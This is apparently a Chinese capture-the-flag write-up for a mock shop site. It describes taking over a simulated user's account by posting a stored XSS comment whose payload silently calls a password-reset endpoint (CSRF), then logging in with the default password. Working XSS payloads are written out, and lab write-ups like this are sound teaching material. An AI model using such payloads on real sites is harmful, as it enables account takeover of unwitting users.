场景已自动模拟了一位mht用户访问关键页面以触发xss,请你想办法通过xss+csrf的方法接管mht账号,在个人中心获取到flag
😳进入靶场又是飞机杯商城

可以直接注册用户,根据题目提示找可能出现xss的地方,商品详情页有评论框,输入
<img src=x onerror=alert(1)>成功弹出页面
然后思考如何怎么利用csrf获取mht的权限,发现修改密码的地方有些特殊,会自动改成123456,并且在第二件商品存在棉花糖的评论,题目说mht会访问,直接构造payload
<img src=1 onerror=” fetch(‘/api/reset_password.php’, { method: ‘POST’, credentials: ‘include’ }) “>
用mht用户登录在个人中心发现了flag







请登录后查看回复内容